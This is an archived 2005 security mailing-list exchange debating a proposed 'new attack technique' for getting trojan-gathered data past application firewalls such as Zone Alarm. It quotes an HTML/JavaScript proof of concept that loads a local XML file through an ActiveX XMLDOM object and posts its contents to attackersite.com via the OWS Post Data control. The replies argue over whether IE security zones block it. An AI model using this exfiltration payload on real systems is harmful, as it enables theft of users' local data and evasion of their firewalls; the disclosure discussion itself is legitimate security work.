Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data

[Gaurav Kumar <gaurav () securebox org>]

On 12/22/05, Debasis Mohanty <mail () hackingspirits com> wrote:
> -----Original Message-----
> From: Gaurav Kumar
> Sent: Wednesday, December 21, 2005 8:59 PM
> To: full-disclosure () lists grok org uk
> Cc: websecurity () webappsec org
> Subject: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
>
> 1>> A Trojan has been to be placed in a system running an
> 1>> application firewall like Zone Alarm Pro etc.
>
> > > Assumptions:
>
> 2>> The target system must be having office XP and the user has
> 2>> to be lured to view a webpage hosted by attacker.
>
> 3>> The Trojan can be designed to generate an xml
> 3>> file which will contain the data to be sent out. The attacker will lure
> the
> 3>> user to visit a website hosted by him.
>
> Lol !! In a practical scenario, the attacker who spreads the worm/trojans
> himself is not aware in the initial stage which are the infected machines
> unless the trojan sends back the machine/user info back to the attacker. Now
> as you have already mentioned ZA is running then no data can be sent back to
> the attacker. So the attacker is clueless which are those infected machines.

Looks like u need to read again what i wrote. I didnt use the word
'spread'. Moreover, u need not know if the target system is running ZA
or not...the technique works even if firewall
is not installed. I am discussing a possible 'design' of a trojan
here, doesnt matter is ZA or any other FW is running on client.

> So the case of luring the user to visit the link is out of scope...

really? ever heard of IE exploits?


> > > The site can have following HTML code-
>
> Now coming back to technical stuff, You are trying to access a local file
> which will only be allowed if the site is in "Trusted Sites" or "Local
> Intranet" or "Local Security Zone" and activex not marked safe. The fact
> that *the client is also the server* is irrelevant.
>
> Try uploading the script to some webserver and give a html extention; it
> will throw an _access denied_ error when the page loads (even on Win XP +
> SP1).
>
> In case of any server side extention like *.asp, *.jsp etc, the user will be
> prompted that an malicious component is trying to load and ask for user
> permission.
>
>
> > > <html>
> > > <body>
> > > The author is not responsible for any misuse,
> > > this PoC is for educational purpose only.
> > > <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > id="exp">
> > > </object>
> > > <script LANGUAGE=javascript>
> > > var xmlDoc
> > > xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > xmlDoc.async=false;
> > > xmlDoc.load("c:\\note.xml");
> > > xmlObj=xmlDoc.documentElement;
> > > var a= xmlObj.firstChild.text;
> > > exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > </script>
> > > </body>
> > > </html>
>
>
> > > The above code (works well on windows XP SP2) essentials calls
> > > "OWS Post Data" COM control to post the contents of note.xml
> > > (generated by trojan) to attackersite.com
>
> IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" and draw
> conclusion about "Internet Security Zone".
>
> You may also link to know about this issue -
> http://support.microsoft.com/kb/317244/EN-US/
>
>
> > > > Essentially, the technique is breaking the basic
> > > > functionality of application firewalls by using OWS Post Data
> > > > as bridge for sending out the data using Javascript and XML.
>
> Not Exactly !! I wud rather suggest you to do a little more research and
> draw any conclusion. Keep those _Security Zones_ in mind before you post
> anything...

Well..Exactly! i would suggest u read the 'assumptions' first, its an
assumption that user will click yes to warning...like most 'normal'
users do.
> - D
>
>
>
> ---------------------------------------------------------------------
> The Web Security Mailing List
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives
> http://www.webappsec.org/lists/websecurity/archive/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/